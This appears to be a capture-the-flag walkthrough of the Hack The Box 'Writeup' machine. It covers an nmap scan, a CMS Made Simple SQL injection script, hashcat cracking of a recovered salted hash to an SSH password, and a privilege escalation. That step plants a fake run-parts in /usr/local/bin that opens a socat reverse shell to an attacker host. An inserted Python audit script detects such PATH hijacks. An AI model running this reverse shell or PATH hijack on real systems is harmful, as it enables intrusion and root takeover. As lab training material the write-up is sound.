$ nmap -A -T4 -p- -sV 10.10.10.138
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-16 21:59 CEST
Nmap scan report for 10.10.10.138
Host is up (0.042s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE    VERSION
22/tcp open  ssh        OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.74 seconds

Although nmap says port 80 is open, it also reports it as tcpwrapped.
What does that mean?
Tcpwrapped refers to tcpwrapper, a host-based network access control program on Unix and Linux.
When Nmap labels something tcpwrapped, it means that the behavior of the port is consistent with one that is protected by tcpwrapper.
Specifically, it means that a full TCP handshake was completed, but the remote host closed the connection without receiving any data (https://secwiki.org/w/FAQ_tcpwrapped).
It is important to note that tcpwrapper protects programs, not ports.
This means that a valid (not false-positive) tcpwrapped response indicates a real network service is available, but you are not on the list of hosts allowed to talk with it.
When a very large number of ports are shown as tcpwrapped, it is unlikely that they represent real services, so the behaviour probably means something else like a load balancer or firewall is intercepting the connection requests.
Access to http://10.10.10.138
Eeyore DoS protection script?
We’ve found this page.
According to the captured request,

GET http://10.10.10.138/writeup/index.php?page=writeup HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Referer: http://10.10.10.138/writeup/
Host: 10.10.10.138
Cookie: CMSSESSID9d372ef93962=c5esgjkeaerfa215rs0119gat7

there is a cookie called CMSSESSID9d372ef93962.
We could use wpscan to try to guess which CMS we are targeting, but in this case it is just as easy to check the source code of the web page.
CMS Made Simple
<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />
On Google: CMS Made Simple 2019

$ python3 46635.py --url http://10.10.10.138/writeup/ --wordlist /usr/share/wordlists/rockyou.txt
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: email@example.com
[+] Password found: 62def4866937f08cc13bab43bb14e6f7

According to the script's code, the password it recovers is an MD5 hash of the salt concatenated with the password, which is what hashcat mode 20 (md5($salt.$pass)) expects. Hashcat can be used to crack it.
To do so we also need the salt the script found alongside the hash.
$ echo "62def4866937f08cc13bab43bb14e6f7:5a599ef579066807" > hash
$ hashcat -a 0 -m 20 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-5557U CPU @ 3.10GHz, 4376/4440 MB (2048 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 64 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

62def4866937f08cc13bab43bb14e6f7:5a599ef579066807:raykayjay9

Session..........: hashcat
Status...........: Cracked
Hash.Name........: md5($salt.$pass)
Hash.Target......: 62def4866937f08cc13bab43bb14e6f7:5a599ef579066807
Time.Started.....: Sat Oct 17 17:22:23 2020 (8 secs)
Time.Estimated...: Sat Oct 17 17:22:31 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   577.3 kH/s (1.29ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 4360192/14344385 (30.40%)
Rejected.........: 0/4360192 (0.00%)
Restore.Point....: 4358144/14344385 (30.38%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: raynerleow -> raygan96

Started: Sat Oct 17 17:21:19 2020
Stopped: Sat Oct 17 17:22:32 2020

The password is: raykayjay9
So we have obtained a username and a password.
$ ssh jkr@10.10.10.138
The authenticity of host '10.10.10.138 (10.10.10.138)' can't be established.
ECDSA key fingerprint is SHA256:TEw8ogmentaVUz08dLoHLKmD7USL1uIqidsdoX77oy0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.138' (ECDSA) to the list of known hosts.
jkr@10.10.10.138's password:
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jkr@writeup:~$
jkr@writeup:~$ cat user.txt
jkr@writeup:~$ wget http://10.10.14.25:8080/linpeas.sh
--2020-10-17 15:56:38--  http://10.10.14.25:8080/linpeas.sh
Connecting to 10.10.14.25:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 293431 (287K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh          100%[=======================================================================>] 286.55K   579KB/s    in 0.5s

2020-10-17 15:56:39 (579 KB/s) - ‘linpeas.sh’ saved [293431/293431]
jkr@writeup:~$ chmod +x linpeas.sh
Starting linpeas. Caching Writable Folders... ...
Analyzing the results, we see that user jkr also belongs to group staff.
...
[+] All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
...
It is not a default group.
staff: Allows users to add local modifications to the system (/usr/local) without needing root privileges (note that executables in /usr/local/bin are in the PATH variable of any user, and they may "override" the executables in /bin and /usr/bin with the same name). Compare with group "adm", which is more related to monitoring/security.
The files and directories writable by group staff are:
[+] Interesting GROUP writable files (not in Home) (max 500)
...
/var/local
/usr/local
/usr/local/bin
/usr/local/include
/usr/local/share
/usr/local/share/sgml
/usr/local/share/sgml/misc
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/entities
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/fonts
/usr/local/share/man
/usr/local/share/emacs
/usr/local/share/emacs/site-lisp
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/xml/declaration
/usr/local/games
/usr/local/src
/usr/local/etc
/usr/local/lib
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/sbin
...
Based on the PATH variable, /usr/local/bin is searched before /bin.
Now let’s run pspy:
jkr@writeup:~$ wget http://10.10.14.25:8080/pspy64
--2020-10-17 16:51:47--  http://10.10.14.25:8080/pspy64
Connecting to 10.10.14.25:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64              100%[=======================================================================>]   2.94M  6.53MB/s    in 0.4s

2020-10-17 16:51:48 (6.53 MB/s) - ‘pspy64’ saved [3078592/3078592]

pspy is a command line tool designed to snoop on processes without needing root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.

2020/10/17 17:06:01 CMD: UID=0    PID=17592  | /bin/sh -c /root/bin/cleanup.pl >/dev/null 2>&1
2020/10/17 17:06:19 CMD: UID=0    PID=17593  | sshd: jkr [priv]
2020/10/17 17:06:19 CMD: UID=0    PID=17594  | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2020/10/17 17:06:19 CMD: UID=0    PID=17595  | run-parts --lsbsysinit /etc/update-motd.d
2020/10/17 17:06:19 CMD: UID=0    PID=17596  | /bin/sh /etc/update-motd.d/10-uname
2020/10/17 17:06:19 CMD: UID=0    PID=17597  | sshd: jkr [priv]
2020/10/17 17:06:19 CMD: UID=1000 PID=17598  | sshd: jkr@pts/1
2020/10/17 17:06:19 CMD: UID=1000 PID=17600  | -bash
When we log in through another ssh connection as user jkr, root runs the command run-parts by its bare name rather than by an absolute path.
This is important because it is exactly when the PATH variable comes into play.
When an absolute path is used there is no need to consult PATH: the system already knows where to find the command.
However, if only the command name is given, the system walks the PATH variable and takes the first directory that contains a file with that name.
In this case, if we place our own run-parts in a directory that appears earlier in PATH, it will be executed as root whenever a new ssh connection is made.
Let's create a known and "nice" run-parts command:
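As an added defensive check (not part of the original writeup), the following Python takes the pspy lines above together with the PATH root used and the directories linpeas reported as writable by group staff, and flags every root-executed bare-name command whose lookup could be won by a file dropped into one of those directories; the genuine binary locations in INSTALLED are assumed.

```python
import os
import re
# Sample input, constructed from the pspy output shown on this page.
SAMPLE_PSPY = """2020/10/17 17:06:19 CMD: UID=0 PID=17594 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2020/10/17 17:06:19 CMD: UID=0 PID=17595 | run-parts --lsbsysinit /etc/update-motd.d
2020/10/17 17:06:19 CMD: UID=0 PID=17596 | /bin/sh /etc/update-motd.d/10-uname
2020/10/17 17:06:19 CMD: UID=1000 PID=17600 | -bash"""

# PATH from the pspy line above and the entries linpeas listed as staff-writable.
# On a live host take PATH from the process environment and test each entry
# with os.access(entry, os.W_OK) while running as the unprivileged user.
ROOT_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
GROUP_WRITABLE = {"/usr/local/sbin", "/usr/local/bin"}
# Assumed locations of the genuine binaries (standard Debian layout).
INSTALLED = {"run-parts": "/bin/run-parts", "sh": "/bin/sh", "env": "/usr/bin/env"}

PSPY_LINE = re.compile(r"^\S+ \S+ CMD: UID=(\d+) PID=\d+ \| (.*)$")

def bare_commands(pspy_output):
    """Yield (uid, argv0) for each pspy line whose argv[0] is a bare name. pspy
    shows argv[0] as the parent passed it, so a hit is a candidate, not proof."""
    for line in pspy_output.splitlines():
        m = PSPY_LINE.match(line)
        if not m:
            continue
        argv0 = m.group(2).split()[0]
        # Absolute paths, login shells ("-bash") and sshd status labels
        # ("sshd: jkr [priv]") are never PATH lookups.
        if argv0.startswith(("/", "-")) or argv0.endswith(":"):
            continue
        yield int(m.group(1)), argv0

def shadowing_dirs(cmd, path=ROOT_PATH, writable=GROUP_WRITABLE, installed=INSTALLED):
    """Writable PATH entries searched before the genuine binary (empty = safe)."""
    real_dir = os.path.dirname(installed.get(cmd, ""))
    hits = []
    for entry in path.split(":"):
        if real_dir and entry == real_dir:
            break  # the real binary is found here; later entries never matter
        if entry in writable:
            hits.append(entry)
    return hits

def audit(pspy_output):
    """Map each bare-name command run as root (UID 0) to the dirs that shadow it."""
    report = {}
    for uid, cmd in bare_commands(pspy_output):
        if uid == 0 and cmd not in report and shadowing_dirs(cmd):
            report[cmd] = shadowing_dirs(cmd)
    return report
```

Running audit(SAMPLE_PSPY) reports both sh and run-parts as shadowable via /usr/local/sbin and /usr/local/bin; fixing the group write permission on those directories, or having the login hook call /bin/run-parts by absolute path, empties the report.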
jkr@writeup:/tmp$ nano run-parts
#!/bin/bash
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.7:4242
jkr@writeup:/tmp$ chmod +x run-parts
jkr@writeup:/tmp$ cp run-parts /usr/local/bin/
On the attacking machine (10.10.14.7), the listener for port 4242 is:
$ socat file:tty,raw,echo=0 TCP-L:4242
root@writeup:/# cat /root/root.txt